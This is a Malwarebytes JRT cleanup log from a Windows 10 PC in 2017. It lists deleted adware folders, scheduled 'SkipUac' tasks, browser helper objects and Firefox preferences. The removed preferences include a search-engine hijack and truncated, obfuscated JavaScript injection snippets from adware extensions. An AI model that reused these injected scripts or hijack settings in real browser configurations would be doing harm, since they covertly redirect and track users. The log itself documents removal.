~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Malwarebytes Version: 8.1.4 (07.09.2017) Operating System: Windows 10 Home x64 Ran by Ifare_000 (Administrator) on Tue 07/25/2017 at 14:40:46.88 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 18 Successfully deleted: C:\end (File) Successfully deleted: C:\ProgramData\1412467463.bdinstall.bin (File) Successfully deleted: C:\ProgramData\epicscale (Folder) Successfully deleted: C:\ProgramData\productdata (Folder) Successfully deleted: C:\ProgramData\Start Menu\Programs\pc tech hotline (Folder) Successfully deleted: C:\Users\Ifare_000\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_oalbifknmclbnmjlljdemhjjlkmppjjl_0.localstorage (File) Successfully deleted: C:\Users\Ifare_000\AppData\Local\stormfall (Folder) Successfully deleted: C:\Users\Ifare_000\AppData\Local\ysearchutil (Folder) Successfully deleted: C:\Users\Ifare_000\AppData\Roaming\Mozilla\Firefox\Profiles\jqv3cjzi.default\user.js (File) Successfully deleted: C:\Users\Ifare_000\AppData\Roaming\Mozilla\Firefox\Profiles\liol21dn.default\user.js (File) Successfully deleted: C:\Users\Ifare_000\AppData\Roaming\productdata (Folder) Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster Scheduler (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (Ifare_000) (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\One System Care Task (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Administrator (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Ifare_000 (Task) Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Administrator.job (Task) Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Ifare_000.job (Task) user_pref(browser.search.hiddenOneOffs, Yahoo,Bing,Amazon.com,eBay,Secure Search,Twitter); user_pref(browser.search.order.1, Secure Search); user_pref(browser.search.selectedEngine, Secure Search); user_pref(extensions.BReCPN8HFG6xnWAu.scode, (function(){try{if(window.location.href.indexOf(\qHU7pjUGpjsErdw8pjUFrdk8rE\)>-1){return;}}catch(e){}try{var d=[[\www.ewoss. user_pref(extensions.dWhBGDTGD8nU56FD.scode, (function(){try{if(window.location.href.indexOf(\qHU7pjUGpjsErdw8pjUFrdk8rE\)>-1){return;}}catch(e){}try{var d=[[\www.ewoss. user_pref(extensions.nOecenEjHMBDKQ5P.scode, (function(){try{if(window.location.href.indexOf(\qHU7pjUGpjsErdw8pjUFrdk8rE\)>-1){return;}}catch(e){}try{var d=[[\www.ewoss. user_pref(extensions.pIgxs7i72uKtBTvG.scode, (function(){try{if(window.location.href.indexOf(\qHU7pjUGpjsErdw8pjUFrdk8rE\)>-1){return;}}catch(e){}try{var d=[[\www.ewoss. Registry: 3 Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{C839014D-8F53-44E2-A81D-7EC2068A0F5A} (Registry Key) Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} (Registry Key) Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} (Registry Key) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on Tue 07/25/2017 at 14:43:44.96 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~